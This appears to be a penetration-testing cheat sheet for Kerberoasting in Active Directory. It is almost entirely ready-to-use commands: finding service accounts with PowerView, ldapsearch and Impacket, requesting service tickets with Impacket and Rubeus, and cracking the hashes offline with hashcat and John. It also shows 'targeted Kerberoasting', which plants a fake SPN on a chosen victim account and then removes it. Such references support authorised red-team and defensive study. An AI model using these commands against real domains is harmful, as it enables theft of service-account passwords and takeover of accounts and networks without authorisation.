Skip to main content

Overview

Any domain user can request TGS ticket for any service with SPN. Ticket encrypted with service account password hash → crack offline.

Find SPNs

PowerView

Get-DomainUser -SPN | Select SamAccountName, ServicePrincipalName

ldapsearch

ldapsearch -x -H ldap://DC_IP -b "DC=domain,DC=local" -D "[email protected]" -w 'pass' "(servicePrincipalName=*)" sAMAccountName servicePrincipalName

Impacket

impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP

Request Tickets

Impacket (Linux)

impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP -request
impacket-GetUserSPNs DOMAIN/user:password -dc-ip DC_IP -request -outputfile hashes.txt

Rubeus (Windows)

.\Rubeus.exe kerberoast
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svc_account

PowerView

Request-SPNTicket -SPN "MSSQLSvc/sql.domain.local"

setspn (Built-in)

setspn -T DOMAIN -Q */*

Crack

Hashcat

hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt

John

john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

Targeted Kerberoasting

Set SPN on user you want to attack (needs GenericAll/GenericWrite).
Set-DomainObject -Identity targetuser -SET @{serviceprincipalname='fake/spn'}
.\Rubeus.exe kerberoast /user:targetuser
Set-DomainObject -Identity targetuser -Clear serviceprincipalname   # Cleanup

Quick Reference

TaskCommand
Find SPNsimpacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC
RequestAdd -request -outputfile hashes.txt
Crackhashcat -m 13100 hashes.txt wordlist
Rubeus.\Rubeus.exe kerberoast